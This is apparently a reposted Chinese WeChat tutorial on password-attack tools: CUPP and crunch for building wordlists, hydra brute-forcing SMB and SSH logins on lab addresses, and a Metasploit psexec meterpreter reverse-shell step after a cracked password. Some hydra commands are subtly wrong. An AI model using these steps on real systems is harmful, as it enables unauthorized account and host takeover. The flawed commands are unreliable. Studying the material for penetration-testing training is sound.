![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/10-1658966092.png "[附下载]推荐几款暴力破解和字典生成的工具")
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/4-1658966093.svg "[附下载]推荐几款暴力破解和字典生成的工具")
点击上方蓝字关注我们
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/0-1658966095.svg "[附下载]推荐几款暴力破解和字典生成的工具")
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/10-1658966096.png "[附下载]推荐几款暴力破解和字典生成的工具")
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
本文主要涉及如下内容
CUPP(kali)
亦思社会工程学学点生成器
一句话密码破解工具
crunch(kali)
hydra(kali)
相关字典和工具可在文末获取百度云下载地址
CUPP(kali)
首先,安装cupp软件
apt install -y cupp
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/6-1658966098.png "[附下载]推荐几款暴力破解和字典生成的工具")
新建一个文件夹,用于保存生成的字典
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/1-1658966099.png "[附下载]推荐几款暴力破解和字典生成的工具")
输入 cupp -i 命令开始编辑生成字典
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/7-1658966102.png "[附下载]推荐几款暴力破解和字典生成的工具")
根据自己已知的信息,生成字典。
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/10-1658966104.png "[附下载]推荐几款暴力破解和字典生成的工具")
查看生成的字典 cat san.txt
亦思社会工程学学点生成器
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/10-1658966107.png "[附下载]推荐几款暴力破解和字典生成的工具")
一句话密码破解工具
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/4-1658966109.png "[附下载]推荐几款暴力破解和字典生成的工具")
crunch(kali)
crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。
首先,先尝试一个简单的命令。如图所示。1 8表示密码是8位 后面的是密码的范围,我们可以看出按照这种方式输出的字典有23TB。(切记,运行一下立马暂停,否则会卡死)
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/1-1658966110.png "[附下载]推荐几款暴力破解和字典生成的工具")
查看帮助
man crunch > crunch.help
命令格式
crunch <min-len> <max-len> [<charset string>] [options]
参数说明
min-len 设定最小字符串长度(必选)
max-len 设定最大字符串长度(必选)
charset string 字符集
options
-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,即包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件
特殊字符
% 代表数字
^ 代表特殊符号
@ 代表小写字母
, 代表大写字母
查看库文件
cat /usr/share/crunch/charset.lst
如图所示,前面显示的名称,后面显示的内容是字符集 。这些都是设置好的,我们也可以自定义写一个字符集。
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/0-1658966113.png "[附下载]推荐几款暴力破解和字典生成的工具")
例子1:生成-1-8位密码字典,字符集合为小写字母,从a开始到zzzzzzzz结束
crunch 1 8
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/3-1658966115.png "[附下载]推荐几款暴力破解和字典生成的工具")
例子2:生成1-6位的密码字典,字符集合为[abcdefg],从a开始到gggggg结束
crunch 1 6 abcdefg
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/8-1658966117.png "[附下载]推荐几款暴力破解和字典生成的工具")
例子3:生成指定字符串,比如生日的日期(%代表数字)
crunch 8 8 -t 199307%% -e 19930730
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/2-1658966119.png "[附下载]推荐几款暴力破解和字典生成的工具")
例子4:生成元素的组合,比如123.com
crunch 7 7 -t %%%.com -s 111.com -e 123.com
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/8-1658966120.png "[附下载]推荐几款暴力破解和字典生成的工具")
例子5:在字典中输出特殊字符
crunch 3 3 abc -t @@@ -l @aa
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/10-1658966122.png "[附下载]推荐几款暴力破解和字典生成的工具")
例子6:以元素组合生成字典[zhangsan|1993|0701]
crunch 4 4 -p zhangsan 1992 0701
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/6-1658966124.png "[附下载]推荐几款暴力破解和字典生成的工具")
例子6:
自定义字符集合
vim /usr/share/crunch/charset.lst
创建自定义字符集合
添加一个字符集 ![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/7-1658966126.png "[附下载]推荐几款暴力破解和字典生成的工具")
使用自定义字符集生成[*.com] 字典文件
crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/8-1658966128.png "[附下载]推荐几款暴力破解和字典生成的工具")
hydra(kali)
首先,先准备两个文件:常用的账号和密码文件。这个是我从github下载的,账号和密码都有几千条。文章最后,我会将文件下载地址分享一下。
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/9-1658966129.png "[附下载]推荐几款暴力破解和字典生成的工具")
windows口令破解
hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr
-l 指定一个用户名
-p 指定一个密码
-P 指定密码字典
-L 指定用户名字典
-vV 显示爆破细节
-o 保存爆破结果
-f 找到正确的密码就停止爆破
-e
n null
s same
r 反向
-t 线程
爆破成功后,我们使用msf中的use exploit/windows/smb/psexec模块去链接。
建立payload set payload windows/meterpreter/reverse_tcp
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/8-1658966131.png "[附下载]推荐几款暴力破解和字典生成的工具")
查看需要配置的参数 show options
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/9-1658966133.png "[附下载]推荐几款暴力破解和字典生成的工具")
设置目标主机 set RHOSTS 192.168.0.110
设置账号和密码 set SMBPass xxx set SMBUser xxx
run或者exploit进行连接
linux口令破解
linux口令破解,也分为远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。
破解ssh服务
hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64
关注公众号,回复如下消息获取
口令:字典生成工具
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/1-1658966134.png "[附下载]推荐几款暴力破解和字典生成的工具")
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/2-1658966135.png "[附下载]推荐几款暴力破解和字典生成的工具")
如果想要系统学习网络安全技术
不妨加入知识星球课程《60天入门网络安全渗透测试》
从入门到案例,贴合实战
轻松易懂、好玩实用
限时领取
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/3-1658966137.gif "[附下载]推荐几款暴力破解和字典生成的工具"){kind=small}
知识星球优惠券![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/4-1658966138.gif "[附下载]推荐几款暴力破解和字典生成的工具"){kind=small}
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/5-1658966139.jpg "[附下载]推荐几款暴力破解和字典生成的工具")
跟着60天路线(点我查看)一起学
期待你的到来!
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/4-1658966141.png "[附下载]推荐几款暴力破解和字典生成的工具")
往期推荐
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/0-1658966143.png "[附下载]推荐几款暴力破解和字典生成的工具")
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/4-1658966145.png "[附下载]推荐几款暴力破解和字典生成的工具")
点个在看你最好看
![[附下载]推荐几款暴力破解和字典生成的工具](http://cn-sec.com/wp-content/uploads/2022/07/4-1658966146.svg "[附下载]推荐几款暴力破解和字典生成的工具")
原文始发于微信公众号(网络安全自修室):[附下载]推荐几款暴力破解和字典生成的工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论